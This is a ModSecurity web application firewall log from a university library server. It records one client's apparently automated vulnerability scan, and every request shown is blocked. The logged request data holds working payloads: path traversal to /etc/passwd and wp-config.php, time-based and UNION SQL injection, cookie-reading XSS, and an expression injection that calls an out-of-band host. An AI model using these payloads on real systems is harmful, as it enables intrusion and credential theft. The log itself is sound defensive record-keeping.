[Tue Aug 29 11:37:16.615959 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAW9IWoAAAAI"]
[Tue Aug 29 11:37:16.674579 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAUbhLQAAABQ"]
[Tue Aug 29 11:37:16.718375 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAXCT@YAAAAG"]
[Tue Aug 29 11:37:27.429684 2023] [:error] [pid 1482] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAXK56AAAAAY"]
[Tue Aug 29 11:37:35.391911 2023] [:error] [pid 1481] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAXJ6XcAAAAX"]
[Tue Aug 29 11:37:37.441644 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAW9IeMAAAAI"]
[Tue Aug 29 11:37:45.479248 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAARiDq0AAAAJ"]
[Tue Aug 29 11:37:47.587128 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAWpXsIAAAAW"]
[Tue Aug 29 11:37:50.475868 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAXA9kMAAAAO"]
[Tue Aug 29 11:37:52.406931 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAW9IhgAAAAI"]
[Tue Aug 29 11:37:59.366482 2023] [:error] [pid 1495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXXhesAAAAF"]
[Tue Aug 29 11:37:59.500278 2023] [:error] [pid 1495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXXhfAAAAAF"]
[Tue Aug 29 11:38:10.697564 2023] [:error] [pid 1521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXxYLEAAAAh"]
[Tue Aug 29 11:38:14.550676 2023] [:error] [pid 1522] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.79.49.154_4beac20f66f8a379a801308d5aeb55f6d68ce5e4"): Internal error [hostname "digilibfkip.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAXyx2MAAAAi"]
[Tue Aug 29 11:38:14.900780 2023] [:error] [pid 1524] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.10.4.34_7f33ed892f28c96e8d19d7642aad69d94fceed4d"): Internal error [hostname "digilibfkip.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAX0KksAAAAl"]
[Tue Aug 29 11:38:14.901267 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "202.46.70.35_d67e5c77ccb4028457e4bbb31078a8f9aaae79dc"): Internal error [hostname "digilibfkip.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAXVypIAAAAB"]
[Tue Aug 29 11:38:15.085595 2023] [:error] [pid 1523] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "66.249.70.6_59c3d4f2509c82627f0eeb8e0e13ae1254eb4065"): Internal error [hostname "digilibfkip.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAXz6-AAAAAk"]
[Tue Aug 29 11:38:15.150821 2023] [:error] [pid 1525] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "66.249.70.6_59c3d4f2509c82627f0eeb8e0e13ae1254eb4065"): Internal error [hostname "digilibfkip.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAX1nwMAAAAm"]
[Tue Aug 29 11:38:15.230576 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "52.167.144.183_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "digilibfkip.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAXm79IAAAAW"]
[Tue Aug 29 11:38:23.456877 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAV1EYcAAAAd"]
[Tue Aug 29 11:38:33.368782 2023] [:error] [pid 1546] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAYKOQgAAAAP"]
[Tue Aug 29 11:38:34.506862 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAYIYhUAAAAM"]
[Tue Aug 29 11:38:34.507978 2023] [:error] [pid 1528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26gp9pueb4ncoq64.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAAX4pl8AAAAF"]
[Tue Aug 29 11:38:35.363310 2023] [:error] [pid 1524] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAX0KnIAAAAl"]
[Tue Aug 29 11:38:46.411410 2023] [:error] [pid 1481] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAXJ6gwAAAAX"]
[Tue Aug 29 11:38:47.363928 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAARiD0AAAAAJ"]
[Tue Aug 29 11:38:47.367166 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAXYiMUAAAAG"]
[Tue Aug 29 11:38:56.467959 2023] [:error] [pid 1558] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYWXYwAAAAF"]
[Tue Aug 29 11:38:57.380717 2023] [:error] [pid 1481] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAXJ6ikAAAAX"]
[Tue Aug 29 11:38:57.399435 2023] [:error] [pid 1566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAYelWYAAAAV"]
[Tue Aug 29 11:39:04.983047 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12aMCo-f0AAAYMWMwAAAAR"]
[Tue Aug 29 11:39:07.082870 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAYlCNIAAAAP"]
[Tue Aug 29 11:39:11.525733 2023] [:error] [pid 1685] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12b8Co-f0AAAaV1XEAAAAi"]
[Tue Aug 29 11:39:12.093694 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAYcusAAAAAN"]
[Tue Aug 29 11:39:12.185601 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAagExAAAAAn"]
[Tue Aug 29 11:39:13.111141 2023] [:error] [pid 1700] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAakQScAAAAr"]
[Tue Aug 29 11:39:18.747906 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO12dsCo-f0AAAXA9pYAAAAO"]
[Tue Aug 29 11:39:23.431897 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAaHMY8AAAAE"]
